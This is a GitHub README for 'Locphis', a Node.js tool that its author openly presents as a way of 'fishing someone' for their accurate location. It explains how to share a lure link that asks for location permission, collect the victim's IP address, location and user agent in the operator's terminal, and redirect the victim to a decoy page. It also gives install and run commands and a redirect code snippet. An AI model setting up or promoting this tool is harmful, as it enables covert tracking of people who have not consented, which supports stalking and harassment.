Skip to content

Latest commit

 

History

History
65 lines (56 loc) · 1.83 KB

README.md

File metadata and controls

65 lines (56 loc) · 1.83 KB

Locphis 🎣 👤

Locphis is a tool for fishing someone with the aim of getting (99%) accurate location

Locphis will send a request for allowing location access

Example:

When the Script is run:

locphis displays a link that can be shared with everyone to get location access permissions.

When the link is accessed

Image2 When the link is accessed, it will display a request to allow location access to the user.

Once the request is allowed by the user. IP, Location and User Agent will be displayed in the Terminal. Image3

Users will also be redirected to another link after allowing the access and must be set first so that users can be directed to other links

Redirect to another link

To change it, you can access the public folder first to edit the script.js file.

xhr.onreadystatechange = function () {
        if (xhr.readyState === 4 && xhr.status === 200) {
            window.location.href = `https://example.com`; //go to another link 
        }
    };

Tested On:

  • Termux
  • Ubuntu

Installation:

Requirement : Nodejs version 20+ and Git

You can install it if you don't have one yet

apt install nodejs git -y

Install Script :

git clone https://github.com/ZeltNamizake/locphis

Edit File Script.js: Before running the script you must edit the script.js file located in the public folder.

cd locphis/public

if it has been changed, you can run the script by means

cd ..
node locphis
Created by Driyas (ZeltNamizake)